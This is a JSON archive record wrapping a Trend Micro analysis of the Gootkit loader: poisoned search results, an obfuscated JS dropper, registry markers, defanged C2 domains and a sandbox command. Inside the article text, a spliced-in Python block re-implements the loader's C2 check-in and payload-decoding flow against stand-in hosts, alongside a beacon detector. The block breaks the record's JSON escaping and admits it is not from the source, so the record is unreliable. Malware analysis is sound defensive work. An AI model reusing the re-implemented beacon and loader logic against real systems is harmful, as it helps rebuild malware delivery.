{
	"id": "a3731aa1-440b-441f-8b14-a408e6c884e7",
	"created_at": "2026-04-06T00:10:46.133781Z",
	"updated_at": "2026-04-10T03:24:24.330322Z",
	"deleted_at": null,
	"sha1_hash": "2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8",
	"title": "Investigating the Gootkit Loader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1527408,
	"plain_text": "Investigating the Gootkit Loader\r\nBy By: Marc Lanzendorfer Dec 11, 2020 Read time: 5 min (1384 words)\r\nPublished: 2020-12-11 · Archived: 2026-04-05 18:40:13 UTC\r\nGootkit has been tied to Cobalt Strike as well as other ransomware attacks in the past. Some of these recent\r\nvictims later suffered SunCrypt ransomware attacks, although it is unclear if this was because of the Gootkit threat\r\nactor or if access was sold to other threat actors.\r\nSince October 2020, we saw an increase in the number of Gootkit cases targeting users in Germany. We\r\ninvestigated this development and found that the Gootkit loader was now capable of sophisticated behavior that\r\nenabled it to surreptitiously load itself onto an affected system and make analysis and detection more difficult.\r\nThis capability was used to deploy a DLL file. Gootkit has, in the past, been tied to Cobalt Strike as well as other\r\nransomware attacks. Some of these recent victims later suffered SunCrypt ransomware attacks, although it is\r\nunclear if this was because of the Gootkit threat actor or if access was sold to other threat actors. We've also\r\ndiscovered in recent weeks that the Gootkit loader is being used in combination with REvil/Sodinokibi\r\nransomware.\r\nInfection vector: Malicious search engine results\r\nIn the cases we saw, the Gootkit loader initially arrives via a ZIP archive downloaded from a website. These\r\nmalicious websites can be found in malicious search engine results, like this:\r\nFigure 1. Malicious search engine results\r\nIn this particular instance, fifa manager kostenlos can be translated as fifa manager free. Note that the search term\r\nused can vary significantly; we just used this search term as an example. 
We have encountered other cases where the search terms were Aldi Talk postident coupon and Control Center 4 download.\r\nhttps://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html\r\nPage 1 of 9\r\nClicking the link leads to a page on a legitimate site; however, the site has been compromised and used to host a malicious page. That page looks legitimate:\r\nFigure 2. Malicious page\r\nIt is meant to look like a forum, with a post containing a link to a file that matches the search query. The link is more sophisticated than it looks, however. Attempting to download the same file again from the same URL on the same host fails; doing so from a different host succeeds, but the downloaded file has a different hash from the original. This suggests that the server generates the file on demand, uniquely for each download attempt, which also means that hashes of the ZIP and of the script inside it are of little use as indicators.\r\nAnalysis of the downloaded file\r\nThe downloaded file is a ZIP archive that contains a heavily obfuscated JS file (with the same filename as the ZIP file, save for the extension). We were able to use JSNice to produce human-readable code:\r\nFigure 3. Deobfuscated code\r\nOf interest here is the function “MT71,” which contains a variable with very long content. Trying to run the script with online runtimes such as Ideone fails with the following error:\r\nFigure 4. Error message\r\nThe error makes apparent what the WScript.Shell object is trying to do:\r\nFigure 5. Partially deobfuscated and beautified code\r\nA new object is created (“WScript.Shell”), which tries to read the registry key “HKCU\\SOFTWARE\\nTpm\\”. 
In case this registry key does not exist, it performs the following actions:\r\nA key with an empty value is written at HKCU\\SOFTWARE\\nTpm\r\nThe value “bE50” is set to 32\r\nIf the key already exists, execution of the script fails because “bE50” is not set. The key is thus a marker that tells the loader whether it has already run on the host, and it is also a cheap artifact to look for during triage.\r\nTo sandbox this script, we used malware-jail from HynekPetrak. A line had to be added to define the variable bE50 as 32; otherwise, the script fails (because of the registry key access).\r\nFigure 6. Modified script\r\nThe following command was then used to run the JS file in the jail:\r\nnode jailme.js -c ./config_wscript_only.json --t404 tr_input/fifa.js tr_output/test -o tr_output/fifa_out.json --trace\r\nWith --t404, the jail answers every request the JavaScript file makes during execution with a 404 error. The run created the following output files:\r\nFigure 7. Contents of testurls.json, showing URLs that the malicious code tried to access\r\nFigure 8. Partial contents of fifa_out.json; contains some interesting artifacts\r\nLooking at the output JSON file shows that the variable “qI27” is an array of three domains:\r\nwww.adpm.com[.]br\r\nwindowp[.]org\r\nwww.ai-tech[.]paris\r\nConverting the whole line of “qI61” into a readable format reveals the following code block:\r\nFigure 9. Contents of the line qI61, showing the connection attempts to the three destination domains in sequence\r\nThe snippet defines the following flow, running the following code against at least one of the URLs stored in qI27:\r\n1. 
“Og13” is set to the digits following the decimal point of a random number, with a maximum length of 100\r\n2. The local user’s DNS domain is queried\r\n   a. If the machine is joined to a domain, “278146” is appended to “Og13”\r\n3. A web request to the next URL from “qI27” is initiated, with “Og13” as the query parameter:\r\n   a. search.php?gqhncrqossifzp={the number in the variable Og13}\r\n4. The return code of the web request is checked\r\n   a. If it is not 200 (OK), the script sleeps and then tries the next URL\r\n5. If the web request returns 200, the response is stored in the variable “zI11”\r\n6. The response text is checked for the “Og13” value\r\n   a. If it is absent, the script sleeps and then tries the next URL\r\n7. If the value is present, it is removed from “zI11”\r\n8. Every double-digit number in brackets, e.g. (12), is replaced with the result of a function that uses the variable “KT44”, which is unknown at this stage\r\n9. Another function, “Nm34” (also currently unknown), is then called with the new variable “va67”\r\nWith the above information, we now know that this loader distinguishes domain-joined from non-domain hosts (by appending “278146” to the search parameter). This matters when sandboxing: a workgroup analysis VM beacons with a different parameter than a corporate victim would.\r\nEnvironment variables can be changed via the wscript.js file. As the malicious script looks for the environment variable “UserDNSDomain,” this was added to the configuration; we also changed the default username:\r\nFigure 10. Modified script\r\nRerunning the script after changing the wscript.js parameters to provide a domain reveals the request of the following URL:\r\nFigure 11. Requested URL\r\nBased on this observation, we can now run jailme.js without the --t404 option, but with the --down=y option. This allowed us to send the queries and download any requested files. 
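The check-in flow enumerated above, re-implemented in Python as an added example (this is not code from the original post, from malware-jail, or from the loader itself): it builds the same search.php query, walks the host list on a non-200 status or a token-less body, strips the echoed token and substitutes the (NN) placeholders, and adds a small matcher for the beacon URL that can be run over proxy logs. The host names, the canned server answers and the KT44 stand-in are constructed for the example; the real KT44 and Nm34 logic is unknown, as the post says, and removing every copy of the token rather than only the first is an assumption.

```python
import random
import string

# Constructed stand-ins for the loader's artefacts so that nothing here touches the network.
# The real qI27 array holds the three domains listed in the post.
QI27 = ['c2-a.invalid', 'c2-b.invalid', 'c2-c.invalid']
DOMAIN_MARKER = '278146'     # appended to Og13 when the host is domain-joined (from the post)
PARAM = 'gqhncrqossifzp'     # query parameter name from the observed beacon (from the post)
MAX_RANDOM_DIGITS = 100


def build_og13(domain_joined, rng=None):
    # Steps 1-2: a random digit string (the fraction part of a random number, at most 100
    # digits), with the domain marker appended when the machine is joined to a domain.
    rng = rng or random
    digits = ''.join(rng.choice(string.digits) for _ in range(rng.randint(1, MAX_RANDOM_DIGITS)))
    return digits + DOMAIN_MARKER if domain_joined else digits


def beacon_url(host, og13):
    # Step 3: the request the post observed, with Og13 as the only parameter.
    return 'http://' + host + '/search.php?' + PARAM + '=' + og13


def extract_payload(body, og13, kt44_lookup):
    # Steps 6-8: the server must echo Og13 (otherwise the response is ignored), the echo is
    # stripped, and every (NN) placeholder is replaced through the KT44-driven function.
    # Assumption: all copies of the token are removed; kt44_lookup stands in for the unknown
    # KT44 logic and maps the two-digit number to a string.
    if og13 not in body:
        return None
    zi11 = body.replace(og13, '')
    out = []
    i = 0
    while i < len(zi11):
        is_placeholder = (zi11[i] == '(' and i + 3 < len(zi11)
                          and zi11[i + 1].isdigit() and zi11[i + 2].isdigit()
                          and zi11[i + 3] == ')')
        if is_placeholder:
            out.append(kt44_lookup(int(zi11[i + 1:i + 3])))
            i += 4
        else:
            out.append(zi11[i])
            i += 1
    return ''.join(out)


def check_in(fetch, og13, kt44_lookup, hosts=QI27):
    # Steps 3-9: try each host in turn; a non-200 status or a body without the token means
    # sleep and move on (the sleep is omitted here). Returns (host, va67) or (None, None),
    # where va67 is what the loader would hand to the unknown Nm34 function.
    for host in hosts:
        status, body = fetch(beacon_url(host, og13))
        if status != 200:
            continue
        va67 = extract_payload(body, og13, kt44_lookup)
        if va67 is None:
            continue
        return host, va67
    return None, None


def looks_like_beacon(url):
    # Detection helper for proxy logs: the fixed path and parameter name, an all-digit value,
    # and a length bounded by the random part plus the optional domain marker.
    needle = '/search.php?' + PARAM + '='
    if needle not in url:
        return False
    value = url.split(needle, 1)[1].split('&', 1)[0]
    return value.isdigit() and 1 <= len(value) <= MAX_RANDOM_DIGITS + len(DOMAIN_MARKER)


def demo():
    # Constructed scenario: host A is down, host B answers 200 without the token (what the post
    # observed), host C echoes the token followed by two placeholders.
    og13 = '4242' + DOMAIN_MARKER
    canned = {
        QI27[0]: (404, ''),
        QI27[1]: (200, 'nothing for you'),
        QI27[2]: (200, og13 + 'x=(07);y=(12);'),
    }

    def fetch(url):
        return canned.get(url.split('/')[2], (500, ''))

    return check_in(fetch, og13, lambda n: 'V' + str(n))


if __name__ == '__main__':
    print(demo())
```

The canned answer from host B reproduces what the authors saw: a 200 with no token is treated by the loader as a failed check-in, so a server can refuse a client it dislikes without ever returning an error status. looks_like_beacon keys on the fixed path and parameter name rather than on the domains, since those rotate while the request shape did not.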
By default, jailme.js stops executing the script after 60 seconds. The result of the queried URL now includes all three identified domains, shown below together with the responses:\r\nFigure 12. URLs and responses\r\nWhile we received HTTP 200 responses, none of them included the random string needed for the script to proceed. This was true for both samples we received. We are unsure why this is the case; all we can say for sure is that the servers are currently not providing the files to be downloaded by Gootkit when they are queried in this manner.\r\nRegistry Analysis\r\nWe can use the presence of registry keys known to Gootkit to test whether it has been deployed on an affected system. On test machines, we were able to verify that the created registry entries were present:\r\nFigures 13 - 16. Created registry keys\r\nThe registry values in the last key can be merged into a PowerShell script:\r\nFigure 17. PowerShell script\r\nMost of this script is encoded; decoding it results in the following:\r\nFigure 18. Decoded code\r\nBy default this code is loaded directly into memory. If it is instead saved to a file, it turns out to be a .NET DLL (detected as Trojan.Win32.DELF.WLDT).\r\nOpening this file in a .NET decompiler shows that it contains yet more encoded code. Dumping that content to a file with the same technique reveals another executable, detected as Trojan.Win32.MALREP.THJBGBO, which we believe is the payload that this loader delivered to the affected system.\r\nConclusions and Trend Micro solutions\r\nThis particular threat highlights the sophistication of today’s malware-delivering loaders. 
In a system without any security solutions enabled, there would be barely any sign of the infection, making analysis and removal more difficult.\r\nWith the appropriate Trend Micro solutions, the user would have been protected from this threat. Deep Discovery Analyzer would have proactively detected the script as a backdoor and classified it as malicious; Apex One would also have been capable of blocking the threat once it was executed.\r\nSource: https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html"
	],
	"report_names": [
		"investigating-the-gootkit-loader.html"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434246,
	"ts_updated_at": 1775791464,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.pdf",
		"text": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.txt",
		"img": "https://archive.orkl.eu/2a0ec21f536254e0e442e7ffa1ee3ba70d7af6c8.jpg"
	}
}